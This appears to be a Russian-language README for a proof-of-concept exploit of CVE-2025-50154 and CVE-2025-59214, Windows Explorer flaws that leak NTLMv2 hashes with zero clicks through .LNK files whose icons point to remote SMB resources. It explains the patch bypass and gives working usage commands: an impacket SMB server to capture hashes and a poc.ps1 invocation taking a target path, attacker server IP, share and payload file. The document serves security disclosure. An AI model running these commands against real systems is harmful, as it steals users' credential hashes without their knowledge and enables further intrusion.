
POC для CVE-2025-50154 и CVE-2025-59214, уязвимости нулевого дня в проводнике Windows, раскрывающие NTLMv2-SSP без взаимодействия с пользователем. Это обход патча безопасности CVE-2025-24054
Авторы: Ruben Enkaoua и Cymulate
Первый блог: Zero Click, One NTLM: Обход исправления безопасности Microsoft (CVE-2025-50154)
Второй блог: Исправлено дважды, но всё ещё обход: Новая утечка NTLM (CVE-2025-50154 Обход исправления)
Исходная уязвимость, недавно исправленная, представляла собой 0-click раскрытие NTLM хеша, которое происходило, когда explorer.exe отображал иконку файла .LNK, чья иконка находилась на удаленном SMB-сервере.
После исправления explorer.exe больше не загружает иконки из удаленных SMB-путей, что предотвращает автоматическое раскрытие NTLM хешей.
Обновление: Исправление для CVE-2025-50154 вообще не сработало. Мы сообщили об этом, и уязвимости был присвоен новый CVE: CVE-2025-59214. POC актуален для обоих CVE.
Создав файл .LNK с:
Процесс explorer.exe всё равно загрузит удаленный файл, чтобы извлечь PE-иконку из его ресурсов RT_GROUP_ICON и RT_ICON.

# put the binary (for example Taskmgr.exe) in the directory and run the SMB server.
impacket-smbserver share . -smb2support
# Replace the values with the path, the responder server IP and the file name on the server. Note: It can take 20 to 30 seconds.
.\poc.ps1 -path "C:\users\user\desktop" -ip "<serverIP>" -share "<share>" -file "<payload.exe>"